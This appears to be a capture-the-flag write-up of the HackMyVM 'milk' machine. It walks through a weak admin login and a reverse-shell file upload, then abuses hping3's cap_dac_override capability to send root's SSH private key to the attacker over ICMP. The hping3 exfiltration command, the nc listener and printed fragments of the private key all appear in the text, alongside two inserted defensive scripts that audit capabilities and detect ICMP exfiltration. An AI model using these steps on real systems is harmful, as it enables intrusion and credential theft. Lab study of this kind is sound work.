hack-my-vm-milk

Port scanning

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.108.13                                                                                [16:17:43]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-21 16:17 CST
Nmap scan report for 192.168.108.13
Host is up (0.0024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:59:6D:18 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.71 seconds

Service exploitation

Found the admin login page; no surprise, it uses a weak password: admin/admin

There is a file upload where all of a vehicle's details are submitted. Before uploading, we have to create a vehicle brand first, otherwise the upload will not succeed.

Try uploading a reverse shell directly.

Note that certain fields must be numeric, otherwise the upload fails. After a successful upload, go back to the home page and browse the vehicles for sale; the model we just uploaded is listed there.

Look at the page source to find the image's address.

That gives us the upload path; visiting it gets us the shell.

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [16:26:27]
listening on [any] 8888 ...
connect to [192.168.108.141] from (UNKNOWN) [192.168.108.13] 49820
bash: cannot set terminal process group (327): Inappropriate ioctl for device
bash: no job control in this shell
www-data@milk:~/html/admin/img/vehicleimages$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@milk:~/html/admin/img/vehicleimages$

Privilege escalation

The routine sudo -l turns up nothing, so just run linpeas instead of enumerating everything by hand.

Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/hping3 = cap_dac_override,cap_net_raw+ep

We find that hping3 has the cap_dac_override capability. What does that do?

cap_dac_override lets a process that holds it bypass the traditional Unix file permission checks: even without read, write or execute permission it can access the file (as long as the filesystem allows it and no other mechanism, such as ACLs or a security module, blocks it).
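The same finding can be turned into a routine check. The script below is an added example, not code from the original post or from linpeas: it parses `getcap -r / 2>/dev/null` output (both the old `path = caps+ep` form shown above and the newer libcap `path caps=ep` form, which is an assumption about libcap 2.41 and later), flags capabilities that grant file access or privilege escalation, and prints the `setcap -r` command that strips them. The sample lines are constructed from the two findings in the post.

```python
"""Audit `getcap -r / 2>/dev/null` output for capabilities that let a binary
read or write files it should not.

Added example for this writeup; it is not code from the original post or from
linpeas.  The SAMPLE lines are constructed from the two findings in the post,
plus one line in the newer libcap output format (assumed format).
"""
import re

# Capability names that are worth a finding on any binary a low-privileged
# user can execute.  cap_net_raw alone (ping) is normal and is not flagged.
RISKY_CAPS = {
    "cap_dac_override": "bypasses file permission checks: arbitrary file read/write",
    "cap_dac_read_search": "bypasses read/search checks: arbitrary file read",
    "cap_setuid": "can switch to any UID, including root",
    "cap_setgid": "can switch to any GID",
    "cap_chown": "can change file ownership",
    "cap_fowner": "bypasses file-owner checks",
    "cap_sys_admin": "broad administrative capability",
    "cap_sys_ptrace": "can attach to and inject into other processes",
    "cap_sys_module": "can load kernel modules",
}

# libcap < 2.41 prints "path = caps+ep"; 2.41 and later print "path caps=ep"
# (assumption about the newer format).
_LINE = re.compile(r"^(?P<path>/\S+)(?: = | )(?P<caps>.+)$")


def parse_getcap_line(line):
    """Return (path, {capability names}) or None if the line is not getcap output."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    caps = set()
    # A clause is "cap_a,cap_b+ep" / "cap_a,cap_b=ep"; several clauses are space separated.
    for clause in m.group("caps").split():
        names = re.split(r"[+=-]", clause, maxsplit=1)[0]
        caps.update(n for n in names.split(",") if n)
    return m.group("path"), caps


def audit(lines):
    """Return one finding per (binary, risky capability), with the remediation command."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        hits = sorted(caps & set(RISKY_CAPS)) or (["all"] if "all" in caps else [])
        for cap in hits:
            findings.append({
                "path": path,
                "capability": cap,
                "why": RISKY_CAPS.get(cap, "every capability"),
                "fix": f"setcap -r {path}",   # drop the file capabilities entirely
            })
    return findings


# Constructed sample: the post's two findings, plus the hping3 line as newer
# getcap would print it.
SAMPLE = [
    "/usr/bin/ping = cap_net_raw+ep",
    "/usr/sbin/hping3 = cap_dac_override,cap_net_raw+ep",
    "/usr/sbin/hping3 cap_dac_override,cap_net_raw=ep",
]

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f['path']}: {f['capability']} ({f['why']}) -> {f['fix']}")
```

Run it against real output with `getcap -r / 2>/dev/null | python3 audit_caps.py` after swapping `SAMPLE` for `sys.stdin`; ping's cap_net_raw is deliberately left alone, since that is the one capability a ping binary is expected to carry.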

But hping3 is just a ping tool that sends ICMP traffic, so we need a way to carry the data out over ICMP.

www-data@milk:/tmp$ RHOST=192.168.108.141
RHOST=192.168.108.141
www-data@milk:/tmp$ LFILE=/root/.ssh/id_rsa
LFILE=/root/.ssh/id_rsa
www-data@milk:/tmp$ hping3 "$RHOST" --icmp --data 1500 --sign xxx --file "$LFILE"

This sends ICMP packets to our attacking machine with a 1500-byte data payload, carrying the contents of LFILE, which here is root's private key.

sudo tcpdump -i eth0 icmp -A

On the attacking side, listen on the corresponding interface for ICMP only; -A prints each captured packet's payload as ASCII text rather than hex.

16:54:17.085408 IP 192.168.108.141 > 192.168.108.13: ICMP echo reply, id 39475, seq 6657, length 1480
E...QS .@.....l...l...aK.3..xxx-----BEGIN OPENSSH PRIVATE KEY-----
16:54:17.085437 IP 192.168.108.141 > 192.168.108.13: icmp
E..0QS..@.....l...l.CvaKAWt26cm8+r48l6/Z1pHNyUfD
16:54:18.086184 IP 192.168.108.13 > 192.168.108.141: ICMP echo request, id 39475, seq 6913, length 1480
E..... .@.....l...l......3..xxxbFbMll+gC2ft0T2stFcm1fonieTr0
DO8oyB5Jbr8Ow3iEMrmlcwt6tX8QQQXbDe4zqVZuNN4MD8CQAAAIEAyJ08IxoQ/6bq8STT
NUcn2jGzBn2BxRkbaKsNcwh3eH0rSeTNN2rBExuwNdUmA3BeViY2Sv7JHiHRqLRqlsHnau
9ScUf/XuSAkkEya7IOVFAPr+e3R7brgT43/P7lOFhBPr/bvMgyoJ8fdWFhs0oJdio8g6en
UXrcRI3NOE6+aV0AAAAJcm9vdEBtaWxrAQI=
-----END OPENSSH PRIVATE KEY-----
...............................................................................
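Reading the capture by eye works once; a detection rule should do it automatically. The following is an added example (not code from the original post or from tcpdump/hping3) that parses raw IPv4/ICMP echo packets, separates stock ping filler from payloads that look like file contents, and flags the oversized, fully printable, key-bearing packets seen above. The two packets it scans are constructed inline: a normal Linux ping and a chunk shaped like the hping3 `--sign xxx --file` transfer; the checksum fields are left at zero because nothing here validates them.

```python
"""Spot ICMP echo payloads that carry file data instead of ping filler.

Added example for this writeup (not code from the original post).  The two
packets below are constructed inline: one normal Linux ping and one shaped
like the hping3 --sign/--file transfer shown in the post.
"""
import string
import struct

IPPROTO_ICMP = 1
ECHO_REQUEST, ECHO_REPLY = 8, 0
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")


def build_icmp_echo(payload, icmp_type=ECHO_REQUEST, ident=0x9A33, seq=1):
    """Construct a minimal IPv4+ICMP echo packet (checksums zeroed; test data only)."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x5153, 0, 64,
                     IPPROTO_ICMP, 0, bytes([192, 168, 108, 13]), bytes([192, 168, 108, 141]))
    return ip + icmp


def icmp_payload(packet):
    """Return (icmp_type, payload) for an ICMP echo packet, or None for anything else."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != IPPROTO_ICMP or len(packet) < ihl + 8:
        return None
    icmp_type = packet[ihl]
    if icmp_type not in (ECHO_REQUEST, ECHO_REPLY):
        return None
    return icmp_type, packet[ihl + 8:]


def looks_like_ping_filler(payload):
    """True for iputils ping (8-byte timestamp then a 0x08.. byte ramp) or Windows 'abcd..' filler."""
    if len(payload) >= 16 and all(payload[i] == i & 0xFF for i in range(8, len(payload))):
        return True
    win = (string.ascii_lowercase[:23] * 4).encode()   # "abcdefghijklmnopqrstuvw" repeated
    return len(payload) == 32 and payload == win[:32]


def classify_payload(payload, max_normal=64):
    """Return the reasons a payload looks like exfiltration (empty list = benign)."""
    reasons = []
    if looks_like_ping_filler(payload):
        return reasons
    if len(payload) > max_normal:
        reasons.append(f"oversized payload ({len(payload)} bytes)")
    if payload:
        printable = sum(b in PRINTABLE for b in payload) / len(payload)
        if printable > 0.9:
            reasons.append(f"{printable:.0%} printable text, not ping filler")
    for marker in (b"-----BEGIN", b"PRIVATE KEY", b"ssh-rsa", b"/etc/passwd", b"root:"):
        if marker in payload:
            reasons.append(f"contains {marker.decode()!r}")
    return reasons


def scan(packets):
    """Run the classifier over raw packets; one verdict per ICMP echo packet."""
    verdicts = []
    for pkt in packets:
        parsed = icmp_payload(pkt)
        if parsed is None:
            continue
        icmp_type, payload = parsed
        verdicts.append({"type": icmp_type, "length": len(payload),
                         "reasons": classify_payload(payload)})
    return verdicts


# Constructed samples: a stock ping (8-byte timestamp + ramp) and an hping3-style
# chunk where the 3-byte signature precedes the file contents, as in the post.
NORMAL_PING = build_icmp_echo(b"\x00" * 8 + bytes(range(8, 56)))
EXFIL_CHUNK = build_icmp_echo(b"xxx" + b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
                              + b"b3BlbnNzaC1rZXktdjEAAAAA" * 40)
SAMPLES = [NORMAL_PING, EXFIL_CHUNK, b"not an ip packet"]

if __name__ == "__main__":
    for verdict in scan(SAMPLES):
        print(verdict)
```

The size threshold alone would already catch this transfer (`--data 1500` against a 56-byte default), but the filler check matters for the opposite direction: a tool that keeps chunks small still has to put non-filler, mostly printable bytes in the payload, and that is what the printable-ratio and marker checks pick up.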

Extract the private key from the capture and use it to log in as root.

kali@kali [~/web_shell_toos] ➜  ssh root@192.168.108.13 -i id_x                                                                             [17:00:17]
The authenticity of host '192.168.108.13 (192.168.108.13)' can't be established.
ED25519 key fingerprint is SHA256:0f7qVkf+B5ngX6Nc7MnxPMmpInzlPiWHdjGS3Vb9Pnc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.108.13' (ED25519) to the list of known hosts.
Linux milk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 19 07:47:41 2021
root@milk:~# whoami
root
root@milk:~#